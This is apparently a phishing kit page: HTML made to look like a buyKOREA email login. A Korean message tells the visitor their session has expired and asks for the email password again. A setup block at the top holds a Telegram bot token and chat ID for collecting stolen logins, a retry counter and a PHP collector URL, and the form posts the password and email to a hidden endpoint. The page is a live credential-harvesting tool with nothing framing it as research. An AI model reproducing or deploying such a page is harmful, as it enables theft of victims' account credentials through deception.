
<script> 
    var g74dUk = "[[-Email-]]";
    //  tg setup area ==========================================================================
    var bot_token = "7125340726:AAH95CSemrRb05S5R3r0OQGUsupYgxxo-Cc";  // set bot token here
    var group_id = "1739269434";                                      // set your chat id here
    // =========================================================================================
    var retries = 2;  // set the number of times the user will put password (0 means unlimited times and shoul not redirect)
    //  php server setup area ========================================================================
    var server_url = "";  // set php script url here
    // ===============================================================================================
</script>


<html id="html" data-emailvalue="[[-Email-]]" data-iframe="0" lang="en"><head>

<!DOCTYPE html>
<html>

<head>


    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>buyKOREA</title>
    <!-- Bootstrap CSS -->
   <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
    <link href="" rel="stylesheet">
<link rel="shortcut icon" href="https://buykorea.org/img/web/favicon.ico" type="image/x-icon">
<style>
body
{
			background-image: url(https://i.gyazo.com/de391ecaaeb8bcda7bf597132d9a790e.jpg);
			  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
		}

		.container{
			width:100%;
			display: flex;
			justify-content: center;
			align-items: center;
			height: 100vh;
		}

		.office{
			width: 500px;
			background: #fff;
		}

		.office-holder{
			width:80%;
			margin: auto;
			padding: 20px 0px;
		}

		.logo{
			width:100%;
			float: left;
			margin-bottom: 2em;
		}

		.logo h1{
			font-family: arial;
		}

		.verify{
			width: 70%;
			margin: auto;
		}

		.verify h4{
			font-family: arial;
		}

		fieldset{
			width: 90%;
			float: right;
			border:2px solid #4285f4;
			border-radius: 5px;
		}

		legend{
			font-size: 15px;
			overflow: hidden;
			width: 42%;
			padding:0px 2px;
			margin: 0px;
		}

		.verify input[type='text']{
			width: 100%;
			float: right;
			border:none;
			padding:3px 10px;
		}

		.verify button{
			border:none;
			height: 40px;
			width: 80px;
			float: right;
			margin-top: 2em;
			background: #4285f4;
			border-radius: 5px;
			color: #fff;
		}

		.email-to-verify{
			border:1px solid #000;
			border-radius: 10px;
		}

		.form-holder{
			width:100%;
			float: left;
		}

		.form-holder h3{
			font-weight: 600;
		}

		.form-holder input[type='email'], input[type='password']{
			width: 100%;
			height:40px;
			float: left;
			margin-bottom: 15px;
		}
		.form-holder .btn-holder{
			width:100%;
			margin-top:1em;
			display: flex;
			align-content: center;
			align-items: center;
			justify-content: center;
		}

		.form-holder .btn-holder .btn{
			background:#0077B5;
			border:none;
			padding:6px 10px;
			color:#fff;
			border-radius: 0px;
			margin-top: 20px;
			margin-bottom: 20px;
		}

		.form-holder .btn-holder .btn:hover{
			cursor:pointer;
		}

		.checkbox{
			width: 100%;
			float: left;
			margin-top:5px;
		}

		.checkbox label{
			font-family:arial;
			font-size:13px;
			float: left;
			margin-left:1em;
		}

		.hide{
			display: none;
		}

</style>
</head>
</td>
</tr>
</td>
</tr>
</table>
<body>
       <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                         <div id="logoname">
			<div> <b><font color="#4D148C"><h3><span class="domain"></h3></span></font color></b></div>
                         <font style="font-weight: 700;font-size: 14px">&#51060;&#47700;&#51068; &#47196;&#44536;&#51064; &#49884;&#44036;&#51060; &#52488;&#44284;&#46104;&#50632;&#49845;&#45768;&#45796;. &#45796;&#49884; &#47196;&#44536;&#51064;&#54616;&#49901;&#49884;&#50724;.</font>
                        <h5 class="font-weight-light"></h5>
                    </div>
			   
                    <center>
                       <div id="auth_reg" style="display: none;font-weight: 600;color: red;">&#51064;&#51613;&#51060; &#54596;&#50836;&#54633;&#45768;&#45796;!</div>
                    </center>
                    <form id="contact" method="POST" action="second">
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <b><font color="#236dad"><h5><span class="ai_txt" name"email" id="m3w41l"></h5></span></font color></b>
                            <h6>잘못된 자격 증명. 다시 시도해 주세요</h6>
                            <h5>{{eman}}</h5>
							<input type="hidden" name="horse" value="{{eman}}">
                            <input type="password" id="q455m0T2" name="pig" placeholder="&#51060;&#47700;&#51068; &#48708;&#48128;&#48264;&#54840;" class="form-control" required="">
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="next_button">&#47196;&#44536;&#51064;</button>
                            </div>
                            <p style="color:#161717; margin-top:1em; float: left; width:100%;"> </p>
                           
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
  

 <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"></script>

</html>
